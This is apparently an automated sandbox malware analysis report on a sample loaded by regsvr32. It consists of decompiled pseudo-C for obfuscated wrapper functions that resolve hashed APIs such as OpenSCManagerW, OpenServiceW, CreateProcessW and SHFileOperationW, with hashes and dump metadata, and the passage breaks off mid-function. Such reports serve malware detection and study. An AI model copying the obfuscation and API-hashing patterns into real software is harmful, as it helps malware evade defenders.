Snapshot File: hcaresult_6_2_2b0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 1240, Parent PID: 1992COMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1056
Total number of Limit Nodes:	17

Executed Functions

Function 003DF1D5 Relevance: 1.6, APIs: 1, Instructions: 69
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E003DF1D5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				intOrPtr* _t58;
				void* _t59;
				signed int _t62;
				void* _t67;
				void* _t68;

				_t68 = __edx;
				_t67 = __ecx;
				E003D9E7D(_t49);
				_v36 = 0xea873e;
				_v32 = 0xb2392b;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0xdc192d;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 + 0x11b5;
				_v12 = _v12 ^ 0x0007f5c7;
				_v20 = 0x6dcef4;
				_t62 = 0x6b;
				_v20 = _v20 * 0x54;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0xe81a0a50;
				_v16 = 0x9ccfab;
				_v16 = _v16 | 0xc76ed5d6;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 ^ 0x000c5bda;
				_v8 = 0xcca784;
				_v8 = _v8 / _t62;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x01549e3f;
				_v8 = _v8 ^ 0x01571d5c;
				_t58 = E003EBFF0(0xac802c42, 0x317, _t62, _t62, 0x42a4b2ae);
				_t59 =  *_t58(_t67, 0, _t68, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28); // executed
				return _t59;
			}

0x003df1e5
0x003df1ea
0x003df1f5
0x003df1fa
0x003df203
0x003df20a
0x003df20d
0x003df210
0x003df217
0x003df21b
0x003df21f
0x003df226
0x003df22d
0x003df23a
0x003df23e
0x003df241
0x003df245
0x003df24c
0x003df253
0x003df25a
0x003df25e
0x003df265
0x003df276
0x003df279
0x003df27d
0x003df284
0x003df2a3
0x003df2b0
0x003df2b8

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,?,00000028,?,?,?,?,?,?,?,?,00000028,00000000,0000002C,00000000), ref: 003DF2B0

Memory Dump Source

Source File: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000007.00000002.721278515.00000000003D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.721323407.00000000003F4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction ID: 7dfbaf708dd881cf5b27cb12863f7f8d7cd61383f341abd1090540b152394fd6
Opcode Fuzzy Hash: 77f1dd4d0ad90e3cc37e42a6920fbdcf951fc3ee27da9feae082ec12eeed1182
Instruction Fuzzy Hash: BC2155B5D0121DAFDB09DFA5C88A8EEFBB4FB44708F10809DE515AA240C7B45B58DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 003D32B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E003D32B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E003D9E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E003EBFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}

0x003d32be
0x003d32bf
0x003d32c2
0x003d32c3
0x003d32c8
0x003d32cd
0x003d32d6
0x003d32d9
0x003d32dc
0x003d32e9
0x003d32ec
0x003d32f4
0x003d32f5
0x003d32fa
0x003d3304
0x003d330b
0x003d330f
0x003d3316
0x003d331d
0x003d3324
0x003d3335
0x003d3338
0x003d333c
0x003d3343
0x003d334a
0x003d3361
0x003d3364
0x003d3377
0x003d3384
0x003d338a

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 003D3384

Strings

w\ y, xrefs: 003D331D

Memory Dump Source

Source File: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000007.00000002.721278515.00000000003D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.721323407.00000000003F4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: w\ y
API String ID: 1889721586-240614871
Opcode ID: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction ID: aa2d6b2d5dcf80b4fd20bbac46b51e8d74584dc4d2458417d72b369753f283da
Opcode Fuzzy Hash: 1f5861dd61b294354832cf9b9edfb87b87b26e314b348a251be8c10d0985441e
Instruction Fuzzy Hash: 782125B5D01229FBCB05DFA9D84A9EEBFB5FB40304F208189E414AA250D3B55B40DF90

Uniqueness

Uniqueness Score: -1.00%

Function 003DC4EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E003DC4EB(void* __ecx, int __edx, short* _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t46;
				void* _t54;
				int _t58;

				_push(_a16);
				_t58 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003D9E7D(_t46);
				_v24 = _v24 & 0x00000000;
				_v36 = 0xd40f1;
				_v32 = 0xcb52a0;
				_v28 = 0x146fa1;
				_v20 = 0xb8dab7;
				_v20 = _v20 >> 1;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x0b80f677;
				_v8 = 0x87dd92;
				_v8 = _v8 + 0xffffe9d3;
				_v8 = _v8 * 0x55;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x54d92ec5;
				_v16 = 0xb88fea;
				_v16 = _v16 | 0xf85cd4fd;
				_v16 = _v16 + 0xed22;
				_v16 = _v16 ^ 0xf8f0d6dc;
				_v12 = 0x2c3d87;
				_v12 = _v12 + 0x3690;
				_v12 = _v12 + 0xfffff048;
				_v12 = _v12 ^ 0x0029d00c;
				E003EBFF0(0x11de522c, 0xe1, __ecx, __ecx, 0x5fb2da2f);
				_t54 = OpenServiceW(_a8, _a4, _t58); // executed
				return _t54;
			}

0x003dc4f2
0x003dc4f5
0x003dc4f7
0x003dc4fa
0x003dc4fd
0x003dc500
0x003dc501
0x003dc502
0x003dc507
0x003dc50e
0x003dc515
0x003dc51c
0x003dc523
0x003dc52a
0x003dc52d
0x003dc531
0x003dc538
0x003dc53f
0x003dc556
0x003dc55e
0x003dc562
0x003dc569
0x003dc570
0x003dc577
0x003dc57e
0x003dc585
0x003dc58c
0x003dc593
0x003dc59a
0x003dc5ad
0x003dc5bc
0x003dc5c2

APIs

OpenServiceW.ADVAPI32(F8F0D6DC,0029D00C,?,?,?,?,?,?,?,?,?,?), ref: 003DC5BC

Strings

", xrefs: 003DC577

Memory Dump Source

Source File: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000007.00000002.721278515.00000000003D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.721323407.00000000003F4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: "
API String ID: 3098006287-1598837362
Opcode ID: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction ID: 23f012087d9ffc2d288aff4b9765d41e2bc14bac6182fb34cd8a93f3f70fd5cf
Opcode Fuzzy Hash: a522d33089ec895b54db4c824c20dd1e836209a16b7f06b25475ede4dc9ef992
Instruction Fuzzy Hash: E62123B5C0020DEBCF15DFA5D8499EEBBB4FF04318F108688E9156A260E3B15B14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 003EA98E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E003EA98E(void* __ecx, void* __edx, void* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t45;
				int _t58;
				signed int _t60;
				signed int _t61;

				_push(_a8);
				_push(_a4);
				E003D9E7D(_t45);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xdfb18c;
				_v12 = 0xac05d3;
				_v12 = _v12 + 0xffffe692;
				_t60 = 6;
				_v12 = _v12 * 0xa;
				_v12 = _v12 ^ 0x06b0bc77;
				_v20 = 0xcbcea5;
				_t61 = 0x73;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x0026c0c8;
				_v16 = 0x706a69;
				_v16 = _v16 + 0xffff322e;
				_v16 = _v16 ^ 0x006745ff;
				_v8 = 0xc7f3e7;
				_v8 = _v8 * 0x7b;
				_v8 = _v8 + 0xffffee1e;
				_v8 = _v8 / _t61;
				_v8 = _v8 ^ 0x00d4d133;
				E003EBFF0(0x11de522c, 0x223, _t61, _t61, 0x2fdf0f26);
				_t58 = CloseServiceHandle(_a4); // executed
				return _t58;
			}

0x003ea994
0x003ea997
0x003ea99c
0x003ea9a1
0x003ea9a7
0x003ea9ae
0x003ea9b5
0x003ea9c2
0x003ea9c5
0x003ea9c8
0x003ea9cf
0x003ea9db
0x003ea9dc
0x003ea9e1
0x003ea9eb
0x003ea9f2
0x003ea9f9
0x003eaa00
0x003eaa17
0x003eaa1a
0x003eaa2b
0x003eaa2e
0x003eaa41
0x003eaa4c
0x003eaa51

APIs

CloseServiceHandle.ADVAPI32(06B0BC77,?,?,?,?,?,?,?,?), ref: 003EAA4C

Strings

ijp, xrefs: 003EA9EB

Memory Dump Source

Source File: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000007.00000002.721278515.00000000003D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.721323407.00000000003F4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID: ijp
API String ID: 1725840886-2001787820
Opcode ID: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction ID: 855e2489a08bdb99553779eae2d6a1cc7a9858a061c922f1bcf8cd8dfa686a54
Opcode Fuzzy Hash: 1ca84afc33d7b938950ae22bf4e2629023950455804043fd17485c6cfe7ce1c4
Instruction Fuzzy Hash: F72117B5D0520DFBEF04DFA4D98A9AEBBB1EB40304F10C19AE404BB250D7B49B449F84

Uniqueness

Uniqueness Score: -1.00%

Function 003D338B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E003D338B(void* __ecx, void* __edx, struct _SHFILEOPSTRUCTW* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t46;
				int _t58;
				signed int _t60;

				_push(_a4);
				E003D9E7D(_t46);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x221b15;
				_v20 = 0x156690;
				_t60 = 5;
				_v20 = _v20 * 0x69;
				_v20 = _v20 ^ 0x08c90ac4;
				_v12 = 0x1a8107;
				_v12 = _v12 / _t60;
				_v12 = _v12 | 0x5e0d12b3;
				_v12 = _v12 * 0x36;
				_v12 = _v12 ^ 0xd6d73012;
				_v8 = 0x305b7c;
				_v8 = _v8 + 0xffffaa6a;
				_v8 = _v8 << 0xf;
				_v8 = _v8 | 0xeac0b19d;
				_v8 = _v8 ^ 0xeaf3a664;
				_v16 = 0x5b8d10;
				_v16 = _v16 * 0x69;
				_v16 = _v16 + 0x95d4;
				_v16 = _v16 ^ 0x258da45e;
				E003EBFF0(0xee7aaf55, 0x302, _t60, _t60, 0x2f7a8b42);
				_t58 = SHFileOperationW(_a4); // executed
				return _t58;
			}

0x003d3391
0x003d3396
0x003d339b
0x003d33a1
0x003d33a5
0x003d33ac
0x003d33b9
0x003d33bd
0x003d33c0
0x003d33c7
0x003d33d8
0x003d33db
0x003d33f2
0x003d33f5
0x003d33fc
0x003d3403
0x003d340a
0x003d340e
0x003d3415
0x003d341c
0x003d3427
0x003d342a
0x003d3431
0x003d3444
0x003d344f
0x003d3454

APIs

SHFileOperationW.SHELL32(D6D73012,?,?,?,?,?,?,?), ref: 003D344F

Strings

|[0, xrefs: 003D33FC

Memory Dump Source

Source File: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000007.00000002.721278515.00000000003D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.721323407.00000000003F4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID: |[0
API String ID: 3080627654-3711761429
Opcode ID: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction ID: 394dfab9159b94b746f595cf911f7e855465c5702b2e9c3a495fcdd94d85ae54
Opcode Fuzzy Hash: 192e83401a02290710fada622201ed24515585c6a043cd12288e9317895715c1
Instruction Fuzzy Hash: 042138B4D00209EFCF04DFA5C94AADEFBB4FB00304F108289E4147A250D7B96B548F90

Uniqueness

Uniqueness Score: -1.00%

Function 003EE373 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E003EE373(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t51;
				signed int _t53;
				void* _t58;

				_push(_a8);
				_t58 = __edx;
				_push(_a4);
				_push(__edx);
				E003D9E7D(_t41);
				_v20 = 0xc362e1;
				_v20 = _v20 + 0xffff2419;
				_v20 = _v20 + 0xffff15b9;
				_v20 = _v20 ^ 0x00c90db5;
				_v16 = 0x370fa8;
				_v16 = _v16 + 0x3ddc;
				_v16 = _v16 + 0xfffffca4;
				_v16 = _v16 ^ 0x003af0ce;
				_v8 = 0x58cda3;
				_t53 = 0x37;
				_v8 = _v8 / _t53;
				_v8 = _v8 | 0xee3498e5;
				_v8 = _v8 + 0xffff3fab;
				_v8 = _v8 ^ 0xee3595ac;
				_v12 = 0xe7384d;
				_v12 = _v12 + 0x2a59;
				_v12 = _v12 * 0x31;
				_v12 = _v12 ^ 0x2c4bf561;
				E003EBFF0(0xac802c42, 0x278, _t53, _t53, 0x298e9f43);
				_t51 = CloseHandle(_t58); // executed
				return _t51;
			}

0x003ee37a
0x003ee37d
0x003ee37f
0x003ee382
0x003ee384
0x003ee389
0x003ee392
0x003ee399
0x003ee3a0
0x003ee3a7
0x003ee3ae
0x003ee3b5
0x003ee3bc
0x003ee3c3
0x003ee3cf
0x003ee3d5
0x003ee3d8
0x003ee3df
0x003ee3e6
0x003ee3ed
0x003ee3f4
0x003ee40b
0x003ee413
0x003ee426
0x003ee42f
0x003ee435

APIs

CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,003E3F2A,00000000), ref: 003EE42F

Strings

M8, xrefs: 003EE3ED

Memory Dump Source

Source File: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000007.00000002.721278515.00000000003D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.721323407.00000000003F4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: M8
API String ID: 2962429428-669864304
Opcode ID: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction ID: a61a47c2f4f8338e2a3816bb6e6e76ceb61473dee01921a3d73908cff5a2a8e4
Opcode Fuzzy Hash: 68676e9891b26dd68fe09ea734f654e49ab76dccc486115711d770e020b531c2
Instruction Fuzzy Hash: 181159B5D00209EFDF59DFA4C84989EBBB4EB40324F108299E824B6290D3B55B058F91

Uniqueness

Uniqueness Score: -1.00%

Function 003E46E0 Relevance: 1.6, APIs: 1, Instructions: 76
processCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E003E46E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				int _t64;
				signed int _t66;
				struct _PROCESS_INFORMATION* _t72;

				_push(_a68);
				_t72 = __edx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E003D9E7D(_t55);
				_v8 = 0x728488;
				_v8 = _v8 + 0x86b5;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xe7c2;
				_v8 = _v8 ^ 0x98526b3c;
				_v16 = 0xdd86ac;
				_v16 = _v16 | 0x9093749e;
				_v16 = _v16 + 0x773d;
				_v16 = _v16 ^ 0x90e3102d;
				_v20 = 0xa04379;
				_v20 = _v20 + 0xe8c2;
				_v20 = _v20 ^ 0x00a70f96;
				_v12 = 0x20815c;
				_t66 = 0x4c;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xbbf973da;
				_v12 = _v12 ^ 0xbbf5b48f;
				E003EBFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
				return _t64;
			}

0x003e46e8
0x003e46ed
0x003e46ef
0x003e46f2
0x003e46f5
0x003e46f8
0x003e46f9
0x003e46fc
0x003e46ff
0x003e4702
0x003e4703
0x003e4706
0x003e4709
0x003e470c
0x003e470d
0x003e4710
0x003e4713
0x003e4716
0x003e4717
0x003e4719
0x003e471e
0x003e4727
0x003e472e
0x003e4732
0x003e4739
0x003e4740
0x003e4747
0x003e474e
0x003e4755
0x003e475c
0x003e4763
0x003e476a
0x003e4771
0x003e477d
0x003e4783
0x003e4786
0x003e478d
0x003e47ae
0x003e47ca
0x003e47d1

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 003E47CA

Memory Dump Source

Source File: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000007.00000002.721278515.00000000003D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.721323407.00000000003F4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction ID: 9cb0d46f065d8bb87af973816dce3eaa7b2ebd49e6e2b693d2f5fd6d8a59f6fa
Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
Instruction Fuzzy Hash: F3311472900248FBCF559F95CD09CDEBF75FB89314F008148FA2466120D3768A60DF60

Uniqueness

Uniqueness Score: -1.00%

Function 003EBF1C Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E003EBF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t47;
				void* _t55;
				long _t60;

				_push(_a40);
				_t60 = __edx;
				_push(_a36);
				_push(0);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003D9E7D(_t47);
				_v20 = 0x8eb723;
				_v20 = _v20 + 0xdb15;
				_v20 = _v20 ^ 0x00852a30;
				_v16 = 0x113147;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x0008263d;
				_v12 = 0x276480;
				_v12 = _v12 + 0x6f6f;
				_v12 = _v12 | 0x7ba60f09;
				_v12 = _v12 * 0x1e;
				_v12 = _v12 ^ 0x7da9aca6;
				_v8 = 0x62f42b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000dc6a5;
				E003EBFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
				return _t55;
			}

0x003ebf24
0x003ebf29
0x003ebf2b
0x003ebf2e
0x003ebf2f
0x003ebf30
0x003ebf33
0x003ebf36
0x003ebf39
0x003ebf3c
0x003ebf3f
0x003ebf42
0x003ebf43
0x003ebf44
0x003ebf49
0x003ebf53
0x003ebf5a
0x003ebf61
0x003ebf68
0x003ebf6c
0x003ebf70
0x003ebf77
0x003ebf7e
0x003ebf85
0x003ebf9c
0x003ebfa4
0x003ebfab
0x003ebfb2
0x003ebfb6
0x003ebfba
0x003ebfbe
0x003ebfd1
0x003ebfe8
0x003ebfef

APIs

CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 003EBFE8

Memory Dump Source

Source File: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000007.00000002.721278515.00000000003D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.721323407.00000000003F4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction ID: 147b789e17cac812d9ead5f9acceef1db0de2962a1dea8394354c4c0d09f3a55
Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
Instruction Fuzzy Hash: D421F47280020DBBCF15DF96D9098DFBFB5FB84748F008198F925A6220D3B28A64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 003E1B22 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E003E1B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t44;
				void* _t55;
				signed int _t57;
				void* _t62;
				long _t63;

				_push(_a16);
				_t62 = __edx;
				_t63 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003D9E7D(_t44);
				_v12 = 0x22ab7;
				_t57 = 0x25;
				_v12 = _v12 * 0x37;
				_v12 = _v12 / _t57;
				_v12 = _v12 + 0xd1d9;
				_v12 = _v12 ^ 0x00090b04;
				_v16 = 0xc8cc57;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 + 0xffff2520;
				_v16 = _v16 ^ 0xfffe92e9;
				_v20 = 0xc52a4b;
				_v20 = _v20 | 0xae757bf4;
				_v20 = _v20 ^ 0xaef18991;
				_v8 = 0xf15120;
				_v8 = _v8 ^ 0xeebb54a4;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x37;
				_v8 = _v8 ^ 0xf39e7cda;
				E003EBFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
				return _t55;
			}

0x003e1b2a
0x003e1b2d
0x003e1b2f
0x003e1b31
0x003e1b34
0x003e1b37
0x003e1b3a
0x003e1b3b
0x003e1b3c
0x003e1b41
0x003e1b50
0x003e1b54
0x003e1b61
0x003e1b64
0x003e1b6b
0x003e1b72
0x003e1b79
0x003e1b7d
0x003e1b84
0x003e1b8b
0x003e1b92
0x003e1b99
0x003e1ba0
0x003e1ba7
0x003e1bae
0x003e1bc2
0x003e1bc5
0x003e1bd8
0x003e1be5
0x003e1bec

APIs

RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 003E1BE5

Memory Dump Source

Source File: 00000007.00000002.721286442.00000000003D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true

Associated: 00000007.00000002.721278515.00000000003D0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.721323407.00000000003F4000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3d0000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction ID: d4e8e3b456dfce5470034a6a174aecc4b27f4a61855ceb53a59499e1bd1b928f
Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
Instruction Fuzzy Hash: DC2133B5D00208FBDF05DFA5C94A8EEBFB5FB80314F10808AE814AA261D3B45B41DF61

Uniqueness

Uniqueness Score: -1.00%

Function 003E66C2 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E003E66C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				intOrPtr* _t45;
				void* _t46;
				void* _t51;

				_t51 = __edx;
				E003D9E7D(_t39);
				_v12 = 0xe2acc8;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xbe17;
				_v12 = _v12 ^ 0x0011993b;
				_v20 = 0xf2f568;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0xbd5142c5;
				_v8 = 0x6d1128;
				_v8 = _v8 + 0xffff2279;
				_v8 = _v8 << 3;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x19de445b;
				_v16 = 0xb26540;
				_v16 = _v16 + 0xffff3889;
				_v16 = _v16 ^ 0x00b459c6;
				_t45 = E003EBFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
